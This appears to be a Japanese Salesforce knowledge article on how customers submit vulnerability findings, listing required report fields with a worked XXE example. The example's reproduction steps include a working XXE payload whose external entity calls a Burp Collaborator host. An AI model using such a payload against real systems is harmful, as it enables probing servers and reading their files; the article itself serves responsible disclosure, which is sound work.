組織を選択
セキュリティ脆弱性の診断提出ガイド
公開日: Oct 1, 2025
説明
2025年10月1日より、製品の脆弱性報告は以下の専用リンクから提出してください。
提出用リンク: https://www.sfdc.co/SubmitVuln
従来のメールアドレス (security@salesforce.com) による受付は、お客様が関連プロセスを調整するための移行期間として2025年11月15日まで継続されます。それ以降は専用リンクをご利用ください。 詳細はこちらで「Revised Guidelines for Salesforce Product Vulnerability Submissions 」を参照してください。
いかなる未解決セキュリティ脆弱性でも、security@salesforce.com でメールを通して Salesforce に報告してください。CRM サービスに関連するセキュリティ診断を提出しようとしている場合、よくある偽陽性を確認するために、Salesforce CRM サービスプラットフォームセキュリティに関する FAQ と Salesforce ヘルプ を確認することをお勧めします。
セキュリティ調査者: こちらで「Salesforce Vulnerability Reporting Policy」を確認してください。
セキュリティ脆弱性診断を提出する前に、セキュリティ脆弱性診断が偽陽性ではないことを検証することを Salesforce は要求しています。診断、特にスキャナー自動レポート出力を確認して検証するために、各自のセキュリティリソースが要求されます。
解決策
次の情報がそれぞれの検証済みのレポートに要求されます。
1. メールの件名行: カスタマーセキュリティ脆弱性診断
2. お客様の会社名と組織 ID/MID/セキュリティ評価が実行された環境への Salesforce の一意の識別子
3. 製品プラットフォーム (Salesforce, Marketing Cloud, Salesforce IQ など)
4. すべての診断の概要と重要度(Severity level)
スクリーンショット例
5. 次の情報を含む、それぞれの診断を説明した詳細
i. 脆弱性の説明: 対象機能、特定された脆弱性、影響を受けるエンドポイントなどの情報を含む
例: 製品 X には、ユーザが XML ファイルのアップロードを通して、取引先レコードを一括で追加できるインポート機能があります。この機能は XML 外部実体攻撃 (XXE) に対して脆弱性があります。XML 外部実体攻撃は XML 入力を解析するアプリケーションに対する攻撃の一種です。この攻撃は、外部実体への参照を含む XML 入力が脆弱に設定されている XML パーサーによって処理されるときに発生します。影響を受けるエンドポイントはこちら: https://example.com/upload/xml1 (POST メソッド), https://example.com/upload/xml2 (POST メソッド)
ii. セキュリティ脆弱性の診断を再現するための手順
例:
a. https://example.com/login に移動してアプリケーションにログインします。
b. https://example.com/upload に移動して、アップロードするファイルを選択し、[アップロード] ボタンをクリックして、Burp Suite で https://example.com/upload/xml へのPOST リクエストを受信します。
c. [ファイル] POST パラメータを次の値に変更します: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM "http://collab_id.burpcollaborator.net/x">;; %ext;]>
d. 上記の <collab_id> の値を Burp コラボレータの一意の ID に変更します。
e. Burp コラボレータで、サーバから受信した pingback を確認します。
d. 上記の <collab_id> の値を Burp コラボレータの一意の ID に変更します。
e. Burp コラボレータで、サーバから受信した pingback を確認します。
iii. 概念実証: 脆弱性が悪用されることを明確に示すような、スクリーンショット、HTTP リクエスト & レスポンス、脆弱性のあるコードの例を提出
例:
a. Burp コラボレータにおいて、サーバの IP アドレスを含むサーバから受信した pingback を示すスクリーンショット 1
b. サーバから受信したペイロードとレスポンスを表示するHTTP リクエスト & レスポンスを示すスクリーンショット 2
b. サーバから受信したペイロードとレスポンスを表示するHTTP リクエスト & レスポンスを示すスクリーンショット 2
iv. セキュリティ脆弱性の診断の影響: 脆弱性が悪用される場合に攻撃者が実現できること、攻撃者(リモート/ローカルユーザ、内部/外部ユーザ、認証済み/未認証ユーザ、閲覧者/編集者/管理者など)、攻撃者が脆弱性を発見して悪用することの容易性などの情報を含む
例: この脆弱性を悪用することで、攻撃者はサーバのローカルファイルを確認することができます。これは機密情報 (サーバに保存されている秘密) の開示につながり、攻撃者に特定の状況でリモートコード実行攻撃へエスカレートさせてしまう可能性があります。この脆弱性は外部、未認証ユーザによって悪用される可能性があります。システムに関する最小限の予備知識と悪用に対する技術的スキルが要求されます。
v. 推奨事項とリファレンス
例: アップロードされたドキュメントを処理する XML パーサは、外部実体を含むことができないように設定されている必要があります。
カスタム開発で発見された脆弱性 (例: apex/Visualforce/サイトなど) については、各自でカスタム開発での診断を検証して対応する必要があります。
お客様のカスタムコードを参照する URL の例:
https://test.visual.force.com/apex/AboutUser
https://na99.visual.force.com/apex/AboutUser
https://example_for_sites_or_communities.force.com/AboutUser
https://na99.visual.force.com/apex/AboutUser
https://example_for_sites_or_communities.force.com/AboutUser
スキャナー生成レポートの偽陽性のある分析の実行。Salesforce のお客様は初期レビューとセキュリティ診断のトリアージを実行するために、自身のセキュリティチームと開発チームと協力することが要求されます。これは全体のレスポンスタイムの実行と迅速化に固有の問題に関連する偽陽性、設定、コーディングを除去することに役立ちます。問題に関連する共通の偽陽性や設定を確認するために、「Salesforce プラットフォームのセキュリティに関する FAQ」と「Salesforce ヘルプ」を確認してください。
迅速な対応のため、レポートは英語で提出してください。英語以外の言語でのレポートは、翻訳のためにトリアージが遅れる場合があります。
ナレッジ記事番号
000384043
この記事で問題は解決されましたか?
ご意見をお待ちしております。
